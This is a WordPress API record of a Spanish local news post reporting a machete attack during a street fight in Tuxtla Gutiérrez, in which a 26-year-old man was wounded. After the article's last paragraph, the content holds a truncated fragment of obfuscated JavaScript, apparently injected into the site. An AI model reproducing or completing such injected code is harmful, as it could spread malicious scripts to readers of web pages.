{"id":9729,"date":"2023-04-26T01:08:12","date_gmt":"2023-04-26T01:08:12","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9729"},"modified":"2023-04-26T01:08:13","modified_gmt":"2023-04-26T01:08:13","slug":"atacan-a-machetazos-a-hombre-en-la-patria-nueva-2","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9729","title":{"rendered":"Atacan a machetazos a hombre en la Patria Nueva"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"540\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/FB_IMG_1682471245082.jpg\" alt=\"\" class=\"wp-image-9730\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/FB_IMG_1682471245082.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/FB_IMG_1682471245082-300x225.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 25 de abril del 2023. Tuxtla Guti\u00e9rrez.- Este lunes por la noche fue atacado un hombre a machetazos en la Colonia Patria Nueva, por motivos desconocidos.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales este hecho ocurri\u00f3 , cerca de las 19:52 horas cuando se registr\u00f3 una ri\u00f1a sobre la Calle Abeto Sur y Laurel entre dos sujetos.<\/p>\n\n\n\n<p>En la pelea uno de ellos sac\u00f3 un machete y atac\u00f3 a sus enemigo causando varias heridas en su anatom\u00eda.<\/p>\n\n\n\n<p>Martha &#8220;A&#8221; de 59 a\u00f1os de edad, relat\u00f3 que su sobrino fue el agredido y el atacante era un sujeto desconocido que vest\u00eda playera de cuadros, short blanco era delgado, alto y tes clara.<\/p>\n\n\n\n<p>Al lugar arribaron param\u00e9dicos de la Cruz Roja para atender a Mois\u00e9s de 26 a\u00f1os de edad que present\u00f3 una herida en el p\u00f3mulo izquierdo y una en la parte frontal del cr\u00e1neo, pero no fue necesario trasladarlo a un nosocomio.<\/p>\n\n\n\n<p>Elementos de la polic\u00eda montaron un operativo de b\u00fasqueda para tratar de atrapar al agresor pero todo fue en vano.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 25 de abril del 2023. Tuxtla Guti\u00e9rrez.- Este lunes por la noche fue atacado un hombre a machetazos en la Colonia Patria Nueva, por motivos desconocidos. De acuerdo con los reportes oficiales este hecho ocurri\u00f3 , cerca de las 19:52 horas cuando se registr\u00f3 una ri\u00f1a sobre la Calle Abeto Sur &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9730,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-9729","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9729","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9729"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9729\/revisions"}],"predecessor-version":[{"id":9731,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9729\/revisions\/9731"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9730"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9729"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9729"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9729"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}